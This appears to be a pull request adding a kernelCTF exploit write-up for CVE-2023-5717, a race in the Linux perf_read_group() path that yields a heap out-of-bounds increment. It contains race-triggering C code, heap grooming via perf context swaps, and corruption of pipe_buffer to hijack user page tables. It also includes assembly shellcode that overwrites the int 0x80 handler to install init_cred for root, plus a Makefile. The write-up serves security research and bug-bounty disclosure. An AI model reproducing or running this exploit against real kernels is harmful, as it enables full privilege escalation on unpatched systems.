Add CVE-2023-5717_mitigation #168

`pocs/linux/kernelctf/CVE-2023-5717_mitigation/docs/exploit.md`
# CVE-2023-5717

## Exploit Details

Exploit demo for CVE-2023-5717. Flag: `kernelCTF{v1:mitigation-v3b-6.1.55:1732857935:6261f8f865bfa74724bdfdf5002d01c644f70ff6}`

## Overview

This vulnerability enables an out-of-bounds increment when a race condition is successfully triggered.
On hardened systems, mitigations such as CONFIG_KMALLOC_SPLIT_VARSIZE increase exploitation complexity.
To circumvent these defenses, I manipulated the buddy allocator to achieve controlled linear heap allocation.

The diagrams below show the hierarchy of perf_event groups when a process creates an event group and then forks a child process.
1) Parent group (initial state)
- At the top, we have a group_leader, which is the leader of the parent event group.
- The group_leader manages multiple sibling events, which are linked together.
```
+-----------------+ +------------+
| group_leader |---------| sibling 1 | <--- Siblings connected to group_leader
+-----------------+ +------------+
```
2) Child group (After forking)
- When the process forks a child process, the event group is inherited by the child.
- This creates a child event group, which consists of new events mirroring the parent group's structure.
- The child event group also has a new group leader, which is the event corresponding to group_leader in the child process.
```
+-----------------+ +------------+
| group_leader |---------| sibling 1 | <--- Siblings connected to group_leader
+-----------------+ +------------+
| |
+-----------+ +-----------+
| child 1 |-------------| child 2 | <--- Children connected to each parent & child group leader
+-----------+ +-----------+
```
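For concreteness, here is a minimal sketch (not taken from the PoC; the event type, flags, and helper name are illustrative) of how such a hierarchy is created: a leader and one sibling are opened with `perf_event_open()`, and a subsequent `fork()` makes the kernel clone the whole group into the child, producing the inherited events shown in the second diagram.
```c
#include <linux/perf_event.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

static int open_event(pid_t pid, int group_fd)
{
    struct perf_event_attr attr;

    memset(&attr, 0, sizeof(attr));
    attr.size           = sizeof(attr);
    attr.type           = PERF_TYPE_SOFTWARE;
    attr.config         = PERF_COUNT_SW_PAGE_FAULTS;
    attr.read_format    = PERF_FORMAT_GROUP;  /* read the whole group at once */
    attr.inherit        = 1;                  /* children inherit the group   */
    attr.exclude_kernel = 1;
    attr.disabled       = 1;
    return syscall(SYS_perf_event_open, &attr, pid, -1, group_fd, 0);
}

int main(void)
{
    int group_leader = open_event(0, -1);            /* "group_leader" above */
    int sibling      = open_event(0, group_leader);  /* "sibling 1"          */

    (void)sibling;
    if (fork() == 0) {   /* the kernel now creates "child 1"/"child 2" events */
        pause();
    }
    return 0;
}
```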

## Race scenario
### CPU0
```c
perf_read()
  ctx = perf_event_ctx_lock(event);
  perf_read_group()
    values = kzalloc(event->read_size, GFP_KERNEL); // [A]
    mutex_lock(&leader->child_mutex);               // [B]
    ret = __perf_read_group_add(leader, read_format, values);
    list_for_each_entry(child, &leader->child_list, child_list) {
      ret = __perf_read_group_add(child, read_format, values);
    }
    mutex_unlock(&leader->child_mutex);
  perf_event_ctx_unlock(event, ctx);
```
### CPU1
```c
perf_release()
  ctx = perf_event_ctx_lock(event);
  perf_remove_from_context(event, DETACH_GROUP|DETACH_DEAD); // [C]
  perf_event_ctx_unlock(event, ctx);                         // [D]
  mutex_lock(&event->child_mutex);                           // [E]
  list_for_each_entry(child, &event->child_list, child_list) {
    perf_remove_from_context(child, DETACH_GROUP);
  }
```
### Description
If execution follows the sequence C -> D -> A -> B -> E, the vulnerability is triggered as follows:
1) At C, the parent event is removed from its parent group, decrementing `group_leader->nr_siblings`, which represents the parent group's size.
2) At A, `values` is allocated based on the value of `group_leader->nr_siblings`, which has now been reduced.
3) At B, CPU 0 locks child_mutex, preventing CPU 1 from proceeding beyond E.
4) At E, CPU 1 attempts to iterate through `event->child_list`, but it is blocked because CPU 0 holds the lock at B.
5) Since the parent group's sibling list is now smaller than the child group's sibling list, `__perf_read_group_add()` on the child writes past the end of `values`, resulting in a heap out-of-bounds increment.
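
As a rough illustration only (the fd names are assumptions and this is not the PoC's code), the userspace side of this race boils down to a `read()` of the group leader on one side racing a `close()` of a sibling event of the parent group on the other:
```c
#include <pthread.h>
#include <unistd.h>

/* leader_fd: fd of the group leader being read (it has inherited children)
 * victim_fd: fd of a sibling event in the parent group                     */
static int leader_fd, victim_fd;

static void *closer(void *arg)
{
    (void)arg;
    /* perf_release(): C detaches the sibling (shrinking nr_siblings and thus
     * read_size), D drops the ctx lock, then E blocks on child_mutex. */
    close(victim_fd);
    return NULL;
}

static void race_once(void)
{
    pthread_t t;
    char buf[0x4000];

    pthread_create(&t, NULL, closer, NULL);
    /* perf_read(): A allocates `values` from the already-shrunken read_size,
     * B takes child_mutex, then iterating the inherited children overflows it. */
    read(leader_fd, buf, sizeof(buf));
    pthread_join(&t, NULL);
}
```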

## Allocating Buffers via the Buddy Allocator
In `perf_read_group()`, the allocated buffer size is determined by the number of active events, so we need a reliable way to inject new events into an existing group from another process.
However, the `perf_event_open()` system call enforces a restriction that new events must belong to the same task as the group leader:
```c
SYSCALL_DEFINE5(perf_event_open,
		struct perf_event_attr __user *, attr_uptr,
		pid_t, pid, int, cpu, int, group_fd, unsigned long, flags)
{
	[...]
	if (pid != -1 && !(flags & PERF_FLAG_PID_CGROUP)) {
		task = find_lively_task_by_vpid(pid);
		if (IS_ERR(task)) {
			err = PTR_ERR(task);
			goto err_group_fd;
		}
	}
	[...]
	event = perf_event_alloc(&attr, cpu, task, group_leader, NULL,
				 NULL, NULL, cgroup_fd);
	[...]
	ctx = find_get_context(pmu, task, event);
	if (IS_ERR(ctx)) {
		err = PTR_ERR(ctx);
		goto err_alloc;
	}

	/*
	 * Look up the group leader (we will attach this event to it):
	 */
	if (group_leader) {
		[...]
		/*
		 * Make sure we're both on the same task, or both
		 * per-CPU events.
		 */
		if (group_leader->ctx->task != ctx->task)
			goto err_context;
		[...]
	}
	[...]
}
```
The check:
```c
if (group_leader->ctx->task != ctx->task)
	goto err_context;
```
ensures that group_leader and the new event belong to the same task.

The function `perf_event_context_sched_out()` is invoked by the task scheduler during context switches:
```c
static void perf_event_context_sched_out(struct task_struct *task, int ctxn,
					 struct task_struct *next)
{
	[...]
	if (context_equiv(ctx, next_ctx)) {
		[...]
		WRITE_ONCE(ctx->task, next);
		WRITE_ONCE(next_ctx->task, task);
		[...]
		RCU_INIT_POINTER(task->perf_event_ctxp[ctxn], next_ctx);
		RCU_INIT_POINTER(next->perf_event_ctxp[ctxn], ctx);

		do_switch = 0;

		perf_event_sync_stat(ctx, next_ctx);
	}
	[...]
}
```
This function swaps ctx between two tasks under the following conditions:

```
child task -> parent task (same event group)
parent task -> child task (same event group)
child task -> child task (same event group)
```

When we pin the child task to CPU0 and the parent task to CPU1, their contexts are no longer swapped back, because the scheduler never switches directly between the two tasks.
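
The `_pin_to_cpu()` helper used in the exploit snippets below is assumed to be a thin wrapper around `sched_setaffinity()`, roughly like this sketch:
```c
#define _GNU_SOURCE
#include <sched.h>

/* Pin the calling task to a single CPU so the scheduler can no longer
 * switch it with the other task and swap their perf contexts back. */
static int _pin_to_cpu(int cpu)
{
    cpu_set_t set;

    CPU_ZERO(&set);
    CPU_SET(cpu, &set);
    return sched_setaffinity(0, sizeof(set), &set);
}
```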

Initially, we create a child process that opens 512 events.
Due to `perf_event_context_sched_out()`, the child's ctx is likely to be swapped with the parent's ctx during a context switch, leaving the child holding what was originally the parent's ctx.

```c
pid = add_siblings_fork(group_leader, 512, 0);
if (pid == 0) {
	ret = 1;
	goto gg;
}

pid = add_siblings_fork(group_leader, 511, pid); // first child has the ownership
if (pid == 0) { // context switching failure?
	ret = 1;
	goto gg;
}
```
To satisfy the condition `group_leader->ctx->task == ctx->task`, we pass pid 0 (the current child process) to `add_siblings_fork()`.
Since the current child process's ctx was swapped with the parent's ctx while `group_leader->ctx` still refers to that context, the check passes.
Because the first child process now holds the parent's ctx, we must pass its pid when calling `add_siblings_fork()` again.
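
`add_siblings_fork()` is a PoC helper whose implementation is not shown in this excerpt. A plausible reconstruction, for illustration only, forks a helper process that attaches `count` new events to the leader while targeting the task `target` (0 meaning the helper itself):
```c
#include <linux/perf_event.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Hypothetical reconstruction of the PoC helper; attr values are assumptions. */
static pid_t add_siblings_fork(int group_fd, int count, pid_t target)
{
    pid_t pid = fork();

    if (pid != 0)
        return pid;  /* parent: pid of the helper that owns the new events */

    struct perf_event_attr attr = {
        .size           = sizeof(attr),
        .type           = PERF_TYPE_SOFTWARE,
        .config         = PERF_COUNT_SW_PAGE_FAULTS,
        .read_format    = PERF_FORMAT_GROUP,
        .inherit        = 1,
        .exclude_kernel = 1,
        .disabled       = 1,
    };

    /* Every new event must satisfy group_leader->ctx->task == ctx->task,
     * so `target` has to be whichever task currently owns the leader's ctx. */
    for (int i = 0; i < count; i++)
        syscall(SYS_perf_event_open, &attr, target, -1, group_fd, 0);

    return 0;  /* the caller's `if (pid == 0)` branch runs in this helper */
}
```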

## Arbitrary increment
- Normally, a page fault increments a counter in the current process's ctx.
- However, after the ctx swap performed by `perf_event_context_sched_out()`, the child's page faults increment counters in the parent's ctx.
- Pinning the parent and child to different CPUs prevents context reswaps, making the attack reliable.

```c
pid_t child_pid = fork();
if (child_pid == 0) { // child read, pinned to CPU_A
	[...]
	char *addr = (char *)mmap(NULL, 0x1000 * 0x80, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	for (int i = 0; i < 0x80; i++) {
		ioctl(group_leader, PERF_EVENT_IOC_ENABLE, 0);
		addr[0x1000 * i] = 0x41; // trigger page faults
		ioctl(group_leader, PERF_EVENT_IOC_DISABLE, 0);
	}
	[...]
	remove_xattr("security.x12296_10", 1); // will be used for oob write
	for (int i = 0; i < 32; i++) {
		read(group_leader, buf, sizeof(buf));
	}
	remove_xattr("security.ssiphim", 1);
	if (setxattr("/tmp/x1", "security.x12296_10", buf, 0x3008, 0) < 0) { // reclaim the buffer
		perror("reclaim failed");
		exit(EXIT_FAILURE);
	}
	[...]
}
else if (child_pid > 0) {
	_pin_to_cpu(CPU_B); // pinned to CPU_B
	sched_yield();
	[...]
}
```

## Arbitrary physical address Read/Write
To extend the race window, we adapted some code from [kernelCTF writeup](https://github.com/google/security-research/blob/master/pocs/linux/kernelctf/CVE-2023-4622_lts/docs/exploit.md).

1) Spraying User PTEs Near pipe_buffer
- First, we allocate a pipe_buffer and then allocate user pages.
- By repeatedly accessing these user pages, we spray user page table entries (PTEs) close to the pipe_buffer in memory (a sketch of this spray follows the shellcode below).

2) Triggering the Vulnerability to Increment `pipe_buffer->page`
- We trigger the vulnerability to increment `pipe_buffer->page`, effectively making it point at the `struct page` of a page that holds user PTEs.
- If the race condition is successful, we gain control over user PTEs and modify them as needed.

3) Patching the int 0x80 Handler
- Once we gain arbitrary memory read/write, we search for the int 0x80 handler and overwrite it with our shellcode.
```asm
swapgs
mov r12, QWORD PTR gs:0x20cc0
mov r14, [r12+0x248]
sub r14, 0x1ec030 // r14 = kbase
mov r8, r14

mov rdi, 1
mov rax, r8
add rax, 0x1bde50

push r12
push r8
call rax // find_task_by_vpid(1)
mov rbx, rax
pop r8
pop r12

mov rax, r8
add rax, 0x2a76900
mov rdi, rax
mov [rbx+2104], rdi // task_struct->ns_proxy = init_nsproxy
mov [r12+2104], rdi // task_struct->ns_proxy = init_nsproxy

mov rax, r8
add rax, 0x2a76b40
mov rdi, rax
mov [r12 + 2008], rdi // task_struct->cred = init_cred
swapgs
iretq
```
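
Returning to step 1 above, the PTE spray can be pictured as in the following sketch. This is a hypothetical illustration, not the PoC's code: the counts, sizes, and helper name are assumptions. The idea is that pipe data pages and user PTE pages are both order-0 buddy allocations, so allocating them back to back makes it likely that pages full of user PTEs sit physically next to the page referenced by a `pipe_buffer`.
```c
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

#define N_PIPES 0x40   /* illustrative count */
#define N_VMAS  0x100  /* illustrative count */

static int   pipes[N_PIPES][2];
static char *vmas[N_VMAS];

static void spray_ptes_near_pipe_pages(void)
{
    char data[0x1000];
    memset(data, 0x41, sizeof(data));

    /* Writing into each pipe allocates an order-0 page for pipe_buffer->page. */
    for (int i = 0; i < N_PIPES; i++) {
        pipe(pipes[i]);
        write(pipes[i][1], data, sizeof(data));
    }

    /* Touching one page in each separate 2 MiB-sized VMA typically forces the
     * kernel to allocate a fresh PTE page (also order-0), so these land
     * physically close to the pipe data pages allocated just above. */
    for (int i = 0; i < N_VMAS; i++) {
        vmas[i] = (char *)mmap(NULL, 0x200000, PROT_READ | PROT_WRITE,
                               MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        vmas[i][0] = 0x41;
    }
}
```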
# Fast, Deterministic TLB Flushing for User PTE Exploits via mprotect()
This technique forcibly flushes the Translation Lookaside Buffer (TLB) after user PTEs have been modified to read or write arbitrary physical addresses. Typically, one might allocate a large chunk of memory to provoke a TLB flush, but in low-memory conditions, where the OOM (Out-Of-Memory) killer might be triggered, this approach becomes infeasible. Our solution is to rapidly toggle page permissions with mprotect(), guaranteeing a TLB flush in a fast and consistent manner, even under memory pressure.

- Eliminating Large Memory Allocations
Instead of allocating huge memory regions to force a TLB flush (risky under OOM conditions), we rely solely on changing existing page permissions. This approach works even in tight memory scenarios where the OOM killer would otherwise prevent new allocations.

- Fast and Consistent TLB Synchronization
By toggling permissions (e.g., R -> RWX -> R), we trigger quick, targeted TLB invalidations. This ensures immediate visibility of any changes to physical memory mapped by the user PTE, vastly reducing the time required to search or exploit the memory region.

## Technique Details
- User PTE Modification
We manipulate user-space page table entries (PTEs) to point to arbitrary physical addresses, gaining direct read or write access to privileged memory content. However, these changes are not recognized until the TLB is invalidated.

- Permission Flipping via mprotect()
The permission flip (mprotect(..., PROT_READ | PROT_WRITE | PROT_EXEC) -> PROT_READ -> back to RWX) forces a TLB flush in all typical Linux environments. This provides a reliable, universal mechanism to update TLB mappings without depending on unpredictable memory allocation behavior.

```c
for (int j = 0; j < 16; j++) {
	mprotect(&spray_addr[ii][jj], 0x1000, PROT_EXEC | PROT_READ | PROT_WRITE);
	if (j % 8 == 0)
		printf("data%d : %lx %lx\n", j, *(uint64_t *)(&spray_addr[ii][jj]), *(uint64_t *)(&spray_addr[ii][jj+0x9b0]));

	if (*(uint64_t *)(&spray_addr[ii][jj+0x9b0]) == 0xc089f8010fca010fULL)
	{
		for (int x = 0; x < sizeof(shellcode); x++)
			spray_addr[ii][jj+0x9b0 + x] = shellcode[x];
		goto found;
	}
	mprotect(&spray_addr[ii][jj], 0x1000, PROT_READ);
	busy_wait(10000);
}
mprotect(&spray_addr[ii][jj], 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC);
```

- Compatible with Low-Memory Scenarios
Even if the system is close to running out of memory (risking OOM-killer triggers), our technique remains viable. By avoiding huge allocations, we circumvent potential OOM kills, ensuring uninterrupted exploitation.

- High Speed, Minimal Overhead
Each permission toggle invalidates only the affected mapping, so the flush is quick and adds negligible overhead to the search loop.
`perf_read_group()` allocates a buffer based on an event's `read_size`, which depends on the size of its `sibling_list`.
If `perf_read_group()` is called when an event's `sibling_list` is smaller than its child's `sibling_list`, it may increment or write beyond the allocated buffer, leading to memory corruption.
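
For reference, the dependence of `read_size` on the sibling count looks roughly like the sketch below, simplified from the kernel's `__perf_event_read_size()` (several `read_format` flags are omitted):
```c
#include <stdint.h>
#include <linux/perf_event.h>

/* Simplified sketch: the buffer size that perf_read_group() will kzalloc()
 * grows with the sibling count of the group leader. */
static int compute_read_size(uint64_t read_format, int nr_siblings)
{
    int entry = sizeof(uint64_t);   /* one counter value per event */
    int size  = 0;
    int nr    = 1;

    if (read_format & PERF_FORMAT_TOTAL_TIME_ENABLED)
        size += sizeof(uint64_t);
    if (read_format & PERF_FORMAT_TOTAL_TIME_RUNNING)
        size += sizeof(uint64_t);
    if (read_format & PERF_FORMAT_ID)
        entry += sizeof(uint64_t);
    if (read_format & PERF_FORMAT_GROUP) {
        nr   += nr_siblings;        /* shrinks when a sibling is detached */
        size += sizeof(uint64_t);   /* leading "nr" field */
    }

    return size + entry * nr;       /* a racing detach makes this too small */
}
```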

This bug was introduced in commit fa8c269353d5 ("perf/core: Invert perf_read_group() loops") in kernel 3.16 and was later fixed in commit 32671e3799ca ("perf: Disallow mis-matched inherited group reads").
exploit:
	gcc -static -o exploit exploit.c

run:
	./exploit

clean:
	rm exploit